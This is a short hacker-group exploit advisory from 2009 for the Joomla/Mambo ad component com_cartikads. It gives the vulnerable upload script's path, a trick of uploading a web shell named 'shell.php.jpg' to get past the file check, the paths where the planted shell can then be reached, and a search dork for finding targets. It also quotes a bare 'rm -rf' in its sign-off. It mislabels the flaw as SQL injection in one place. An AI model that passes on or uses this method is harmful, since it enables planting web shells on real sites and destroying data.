################################################################################### # [~] Joomla components com_cartikads Remote File Upload vulnerability # [~] Author : kaMtiEz (kamzcrew@yahoo.com) # [~] Homepage : http://www.indonesiancoder.com # [~] Date : January 02, 2009 # # ################################################################################### [ Software Information ] [+] Vendor : http://www.cartikahosting.com [+] Download : - [+] version : 1.0 [+] Vulnerability : SQL injection [+] Dork : "Think iT" [+] Price : dunno [+] Location : INDONESIA - JOGJA [+] description : Cartikads is a Mambo Open Source ads management component. ################################################################################## [ HERE WE GO .. LIVE FROM JOGJA CITY ] [ Vulnerable File ] http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php [ NOTE ] upload with extension shell.php.jpg your shell will be http://server/[kaMtiEz]/images/stories/shell.php.jpg http://server/[kaMtiEz]/images/banners/shell.php.jpg =========================================================================== [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry .. [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk [ NOTE ] [+] Nyak ama babe gua .. tak lupa adik gua .. [+] tukulesto : where did u go ?? [+] Dengerin Radio yach di http://antisecradio.fm :D [ QUOTE ] [+] rm -rf [ EOF ] [+] INDONESIANOCODER TEAM [+] KILL -9 TEAM